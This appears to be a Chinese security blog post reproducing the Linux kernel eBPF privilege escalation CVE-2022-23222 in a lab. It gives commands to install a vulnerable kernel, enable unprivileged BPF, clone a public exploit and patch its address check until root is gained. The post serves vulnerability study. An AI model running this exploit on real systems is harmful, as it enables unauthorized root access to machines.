Linux内核eBPF权限提升漏洞复现(CVE-2022-23222)

2022年6月27日08:07:48评论289 views字数 1468阅读4分53秒阅读模式

星期五实验室

阅读须知

星期五实验室的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息造成的直接或间接后果和损失，均由使用者本人负责。

星期五实验室拥有对此文章的修改、删除和解释权限，如转载或传播此文章，需保证文章的完整性，未经授权，不得用于其他。

漏洞介绍

eBPF(extended Berkeley Packet Filter) 是一种可以在 Linux 内核中运行用户编写的程序，而不需要修改内核代码或加载内核模块的技术。简单来说eBPF 让 Linux 内核变得可编程化了。由于内核在执行用户提供的 eBPF 程序前缺乏适当的验证，攻击者可以利用这个漏洞获取root权限。

影响版本:Linux kernel 5.8 - 5.16不受影响版本:Linux kernel 5.10.92, 5.15.15, 5.16.1

环境设置

修改内核版本，这里选择5.13.0-21作为实验环境

sudo apt install linux-image-5.13.0-21-generic

安装完成后重启虚拟机，长按esc进入grub启动菜单，选择需要的内核版本

查看内核是否修改，发现修改成功

查看普通用户是否能调用ebpf功能，如果不能，需要将值修改为0

tail /proc/sys/kernel/unprivileged_bpf_disabledecho 0 >/proc/sys/kernel/unprivileged_bpf_disabled

值为0表示允许非特权用户调用bpf值为1表示禁止非特权用户调用bpf且该值不可再修改，只能重启后修改值为2表示禁止非特权用户调用bpf，可以再次修改为0或1

漏洞复现

从github下载漏洞利用exp

git clone https://gitclone.com/github.com/tr3ee/CVE-2022-23222.git  #使用gitclone.com可以下载加速

make编译运行，发现报错

根据报错在exploit.c中定位到相关代码，修改判断的值为0xFFFF900000000000，或者将这个if语句注释掉也可以

    u64 array_map = (u64)ctx->ptrs[20] & (~0xFFL);    if ((array_map&0xFFFFF00000000000) != 0xFFFF800000000000) {        WARNF("Could not leak array map: got %p", (kaddr_t)array_map);        goto abort;    }

重新编译运行发现提权成功

Linux内核eBPF权限提升漏洞复现(CVE-2022-23222)

参考链接:

https://github.com/tr3ee/CVE-2022-23222https://tr3e.ee/posts/cve-2022-23222-linux-kernel-ebpf-lpe.txt

FRIDAY LAB

星期五实验室成立于2017年，汇集众多技术研究人员，在工业互联网安全前瞻技术研究方向上不断进取。星期五实验室由海内外知名高校的学院精英及来自于顶尖企业的行业专家组成，且大部分人员来自国际领先、国内知名的黑客战队——浙大AAA战队。作为木链科技专业的技术研发团队，星期五实验室凭借精湛的专业技术水平，为产品研发提供新思路、为行业技术革新探索新方向。

扫二维码｜关注我们

星期五实验室
FRIDAY LAB

原文始发于微信公众号（星期五实验室）：Linux内核eBPF权限提升漏洞复现(CVE-2022-23222)

左青龙
微信扫一扫

右白虎
微信扫一扫

Linux内核eBPF权限提升漏洞复现(CVE-2022-23222)

干货 | 支付金额类漏洞挖掘技巧总结

记一次价格500rmb的短信轰炸

【相关分享】内网信息收集

如何构建自己的自定义 C2 框架

如何使用CsWhispers向C#项目添加DInvoke和间接系统调用方法

深信服防火墙AF策略路由如何配置？

【OSCP】gigachad

CVE-2024-0015复现 (DubheCTF DayDream)

《生成式人工智能服务安全基本要求》原文参阅

网络安全工程师必知的系统敏感目录

发表评论

在线咨询

微信